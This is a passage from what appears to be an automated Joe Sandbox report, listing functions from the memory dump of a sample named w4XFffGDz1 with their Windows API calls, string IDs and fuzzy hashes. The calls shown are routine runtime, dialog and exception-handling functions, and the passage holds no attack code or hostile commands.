                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ItemText
                        • String ID:
                        • API String ID: 3367045223-0
                        • Opcode ID: 4c4f61d42b6e8014f096bbb01881a259d731beb5931caccf466eebfce11e1861
                        • Instruction ID: 111039b204413eb51cbba886b342ce0539a8d1239041c4ed2c213bd75b0dc566
                        • Opcode Fuzzy Hash: 4c4f61d42b6e8014f096bbb01881a259d731beb5931caccf466eebfce11e1861
                        • Instruction Fuzzy Hash: 71C00231108200FFDB05CF48E948D1ABBB6FB95315B11C558F058C6431C331D864DB66
                        APIs
                        • ___delayLoadHelper2@8.DELAYIMP ref: 0018BAFA
                          • Part of subcall function 0018BDD7: DloadAcquireSectionWriteAccess.DELAYIMP ref: 0018BDE2
                          • Part of subcall function 0018BDD7: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0018BE4A
                          • Part of subcall function 0018BDD7: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0018BE5B
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
                        • String ID:
                        • API String ID: 697777088-0
                        • Opcode ID: 2a906cb056acdabf1e00866d1b6fafccb55b1d9cece4fed19936325066b8e4a3
                        • Instruction ID: 3f51a1c067578a34d820c8cea4b31a4eb2fc5a1fc1d476c07f29a030100f2f3f
                        • Opcode Fuzzy Hash: 2a906cb056acdabf1e00866d1b6fafccb55b1d9cece4fed19936325066b8e4a3
                        • Instruction Fuzzy Hash: 41A002DABED1417DB10872917D47C3B061CC5D7F253748A5EF590C8481AB803D850971
                        APIs
                        • __EH_prolog3_GS.LIBCMT ref: 0018859A
                          • Part of subcall function 00171B78: GetDlgItem.USER32(00000000,00003021), ref: 00171BBC
                          • Part of subcall function 00171B78: SetWindowTextW.USER32(00000000,001A2668), ref: 00171BD2
                        • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0018861B
                        • EndDialog.USER32(?,00000006), ref: 0018862E
                        • GetDlgItem.USER32(?,0000006C), ref: 0018864A
                        • SetFocus.USER32(00000000), ref: 00188651
                          • Part of subcall function 001714A3: _wcslen.LIBCMT ref: 001714B4
                          • Part of subcall function 00171B1B: SetDlgItemTextW.USER32(?,?,?), ref: 00171B30
                        • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 001886C3
                        • FindFirstFileW.KERNEL32(?,?), ref: 001886E3
                        • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00188786
                        • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0018880D
                          • Part of subcall function 00171170: _wcslen.LIBCMT ref: 0017117B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                        • String ID: %s %s$REPLACEFILEDLG
                        • API String ID: 485132379-439456425
                        • Opcode ID: b3ac8ab5f9da12c0e9275c51d68ebf8fc4a62f14c979cb99bf07810e003650f8
                        • Instruction ID: d145bbd362b5f41a2cd0b92d16a14ff8223439630529e8f776b3a74105a1880d
                        • Opcode Fuzzy Hash: b3ac8ab5f9da12c0e9275c51d68ebf8fc4a62f14c979cb99bf07810e003650f8
                        • Instruction Fuzzy Hash: CDA15E71900218AAEB25EB64CD8AFEE777CAF25700F508095B609B7181EF719F85CF61
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: 927720c7047493621f0b7e3b84dfc3f602cafed76d0d9322b89816998f2c7942
                        • Instruction ID: 9ea8ee9990242640753daec223a204cd0a6fec3dd44334e9af3b8f1d4486775c
                        • Opcode Fuzzy Hash: 927720c7047493621f0b7e3b84dfc3f602cafed76d0d9322b89816998f2c7942
                        • Instruction Fuzzy Hash: 7DC22C71E086288FDF29CE28EE847EAB7B5EB44315F1541EAD44DE7240E774AE818F40
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0018D24E
                        • IsDebuggerPresent.KERNEL32 ref: 0018D31A
                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0018D33A
                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0018D344
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                        • String ID:
                        • API String ID: 254469556-0
                        • Opcode ID: f7c6a9caa9a1df6c989d2e0577be1a6b23eaca2160096b48e3057805b33c2294
                        • Instruction ID: 832bd49f00a2bbe368d9f34bb0a0fb7a1468a0aa6df21033359db3adff62db53
                        • Opcode Fuzzy Hash: f7c6a9caa9a1df6c989d2e0577be1a6b23eaca2160096b48e3057805b33c2294
                        • Instruction Fuzzy Hash: 29310875D013189BDB11EFA4D989BCCBBB8BF14300F10419AE50DAB290EB705B85CF05
                        APIs
                        • GetLastError.KERNEL32 ref: 00172E73
                        • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,?,00000000,00000000), ref: 00172E94
                        • _wcslen.LIBCMT ref: 00172EA3
                        • LocalFree.KERNEL32(?), ref: 00172EB6
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                        • String ID:
                        • API String ID: 991192900-0
                        • Opcode ID: 22b3f15957607e176a928dbba1520c44dfe8a644e033a382865db5f1b07bd5eb
                        • Instruction ID: 6368b1079ccedea8a8039c8fad336a70b2622c2de28af69121d4438b13940ce9
                        • Opcode Fuzzy Hash: 22b3f15957607e176a928dbba1520c44dfe8a644e033a382865db5f1b07bd5eb
                        • Instruction Fuzzy Hash: 71F08275600204BBEB089BA59E05DFF777C9B85750B10C058F905A7540CB749E82D674
                        APIs
                        • VirtualQuery.KERNEL32(80000000,0018BB62,0000001C,0018BD57,00000000,?,?,?,?,?,?,?,0018BB62,00000004,001CB520,0018BDE7), ref: 0018BC2E
                        • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0018BB62,00000004,001CB520,0018BDE7), ref: 0018BC49
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: InfoQuerySystemVirtual
                        • String ID: D
                        • API String ID: 401686933-2746444292
                        • Opcode ID: 9d1e02fed7e9849123b4848b988f867700cec7fdf871352c8fd230570dee5878
                        • Instruction ID: 40303b036d697e664d8b799cf96c268564a2274a54190d6d4f6938405d7786d7
                        • Opcode Fuzzy Hash: 9d1e02fed7e9849123b4848b988f867700cec7fdf871352c8fd230570dee5878
                        • Instruction Fuzzy Hash: 8A01DB72604109ABDB14EE29DC45BDE7BA9EFD4324F0CC224ED59D7154DB34D9418B80
                        APIs
                        • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0018C17E), ref: 001913AC
                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0018C17E), ref: 001913B6
                        • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0018C17E), ref: 001913C3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled$DebuggerPresent
                        • String ID:
                        • API String ID: 3906539128-0
                        • Opcode ID: 7309a5c8240994cd6fc966574bf0102efa6ff5258dcd8ce550b9eaac89f58f9f
                        • Instruction ID: 6914acf571e4ef3f5f6873f0f05987ce34c3c412c9dc7547c15157a04ed55935
                        • Opcode Fuzzy Hash: 7309a5c8240994cd6fc966574bf0102efa6ff5258dcd8ce550b9eaac89f58f9f
                        • Instruction Fuzzy Hash: 0D31C47590132DABCB21DF68D88979CBBB8BF18310F5041DAE81CA7690EB709F818F44
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID: .
                        • API String ID: 0-248832578
                        • Opcode ID: 23866a62fbcdc21db6378a15dca2aa2c1fe1982df8a094f94a3f62ddf0bdf079
                        • Instruction ID: f8f2ac1bbd79084bac1a752dca87006726b5397eee3382add9fc9ca1a188ff5b
                        • Opcode Fuzzy Hash: 23866a62fbcdc21db6378a15dca2aa2c1fe1982df8a094f94a3f62ddf0bdf079
                        • Instruction Fuzzy Hash: 1B31E6719002496FDF289EB8CC85EFB7BBDDB86314F1401A8F41997292EB319D448B50
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: bfdb16e9976882d12b85e4a6a493654685016078fef5a2c446867b91eb1d5b38
                        • Instruction ID: 18e609ca951c48a072d70991ffba9beae55d9914c82fbc4342041bf605593ae0
                        • Opcode Fuzzy Hash: bfdb16e9976882d12b85e4a6a493654685016078fef5a2c446867b91eb1d5b38
                        • Instruction Fuzzy Hash: EC022B71E002199FDF18CFA9C8906ADBBF1FF88314F658269D819EB340D731AA458B91
                        APIs
                        • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00186D2B
                        • GetNumberFormatW.KERNEL32(00000400,00000000,?,001AE6E4,?,?), ref: 00186D74
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FormatInfoLocaleNumber
                        • String ID:
                        • API String ID: 2169056816-0
                        • Opcode ID: 3919de3005f18c8211a499a3baecdc67322dc97078fd76f1d777729875e9cfad
                        • Instruction ID: 5873befd092e0ea3e4fa3de9cebc39595548598e1e02426a91bdeb2d8dac31fc
                        • Opcode Fuzzy Hash: 3919de3005f18c8211a499a3baecdc67322dc97078fd76f1d777729875e9cfad
                        • Instruction Fuzzy Hash: D9117975211208AAD701DF64DC01FAF77F9EF19300F40842AFA05A7690D370AA84CB65
                        APIs
                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0019EE2D,?,?,00000008,?,?,0019EACD,00000000), ref: 0019F05F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ExceptionRaise
                        • String ID:
                        • API String ID: 3997070919-0
                        • Opcode ID: f79b60394cd92816a078f48a5f5f745463c23ad53ee1ceb512e2a1a6effea6ec
                        • Instruction ID: e085be1b97473e4249880305b754e8ce2fb5b420eb7220f45bbfeef0612c4d45
                        • Opcode Fuzzy Hash: f79b60394cd92816a078f48a5f5f745463c23ad53ee1ceb512e2a1a6effea6ec
                        • Instruction Fuzzy Hash: 10B13F31610609DFDB19CF28C48AB657BE1FF45364F29866DE899CF2A2C335D992CB40
                        APIs
                        • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0018D074
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: FeaturePresentProcessor
                        • String ID:
                        • API String ID: 2325560087-0
                        • Opcode ID: 17925c5e42cefac0d5912375ecc79afe1ec29bb6760d1a12b22ba59df21b6507
                        • Instruction ID: 0bb2600a025739b4004b7d3763d6f7530438934c41a9e2385d4c79ec9617beab
                        • Opcode Fuzzy Hash: 17925c5e42cefac0d5912375ecc79afe1ec29bb6760d1a12b22ba59df21b6507
                        • Instruction Fuzzy Hash: 6F518FB1D107058FEB18DFA9E8867AABBF5FB48310F14842AD405EB6A0D375DA41CF50
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID: c
                        • API String ID: 0-112844655
                        • Opcode ID: 9d6b17cb8980368b4ca3da69603f03e176f3b35297cbec25d4a2cdc700c2f031
                        • Instruction ID: 7fec7b5076923c6e1bb12178f55dbfea148665c9d1ff042d041ec7c24562134f
                        • Opcode Fuzzy Hash: 9d6b17cb8980368b4ca3da69603f03e176f3b35297cbec25d4a2cdc700c2f031
                        • Instruction Fuzzy Hash: 35E13675A083558FC729DF28D480A6BF7F1BB88348F11893EE89997351D730A946CF42
                        APIs
                        • GetVersionExW.KERNEL32(?), ref: 00175063
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: Version
                        • String ID:
                        • API String ID: 1889659487-0
                        • Opcode ID: d619c8e5de34073e8ac4581fae9d8771f096770370ab40d2eba6574e9c1113a1
                        • Instruction ID: c348ce209c05ec685f9ca0354513ed8ceb3d93a1cb06ea8df5f9912143ae53cc
                        • Opcode Fuzzy Hash: d619c8e5de34073e8ac4581fae9d8771f096770370ab40d2eba6574e9c1113a1
                        • Instruction Fuzzy Hash: AB014B70A00208CFD728DF68ED51A9D77F2BB49314F208618F92A93791E770AA858F40
                        APIs
                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001D400,0018CE75), ref: 0018D3EA
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: ExceptionFilterUnhandled
                        • String ID:
                        • API String ID: 3192549508-0
                        • Opcode ID: 628dd0cd9fd1fcec5f3e567560eaa12a17950faa06d9f137baf0033008eeb8c2
                        • Instruction ID: 6323ff9db5f00b9b134db54458d10a86fd845beae1d1baf714de80121170dad0
                        • Opcode Fuzzy Hash: 628dd0cd9fd1fcec5f3e567560eaa12a17950faa06d9f137baf0033008eeb8c2
                        • Instruction Fuzzy Hash:
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID: HeapProcess
                        • String ID:
                        • API String ID: 54951025-0
                        • Opcode ID: 82c2aca08041d6e105f4bc07945b872400c73875c257a14df610cb56ed316267
                        • Instruction ID: f7dd4c68d6370f7815d5489a672e42d5b1ab42cb442f36ec620d0b6115063959
                        • Opcode Fuzzy Hash: 82c2aca08041d6e105f4bc07945b872400c73875c257a14df610cb56ed316267
                        • Instruction Fuzzy Hash: CAA001706562018B97808F3AAE9A6493AAAAB46A91B058069E505C5A60EB348491AF01
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 10cbf7604baf462b1d0f7a410d3f9693d953a90b2e1a079bcb30284bb94946d4
                        • Instruction ID: 6e54442646957086ea05bb747165fd66c1dd0b32ae2b6c4e9c7bc957a8389f79
                        • Opcode Fuzzy Hash: 10cbf7604baf462b1d0f7a410d3f9693d953a90b2e1a079bcb30284bb94946d4
                        • Instruction Fuzzy Hash: D2524A72A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f1de4f6d40cda86ee587d5d7d498e822294e383bc4a09da5ea8dd203769b46d5
                        • Instruction ID: 2373041d7340461144697e7ab4294e491703ff53473286315659e52008c45fa0
                        • Opcode Fuzzy Hash: f1de4f6d40cda86ee587d5d7d498e822294e383bc4a09da5ea8dd203769b46d5
                        • Instruction Fuzzy Hash: 0B22F57190471D8BC766EF58DC9442ABBE1FF98328F150A1DF8A197391D730DA898F82
                        Memory Dump Source
                        • Source File: 00000000.00000002.2176597112.0000000000171000.00000020.00000001.01000000.00000003.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000000.00000002.2176581837.0000000000170000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176624855.00000000001A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176642907.00000000001B7000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2176676802.00000000001CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_170000_w4XFffGDz1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e4a83813c1d231c1dff236a8c6d20c4c2446dbafe787cacd3a7110b4a3606fd0
                        • Instruction ID: bf22d6c7081eabb23cac8015b08660cbc8c0628a0d2d4411deded85a9117677d
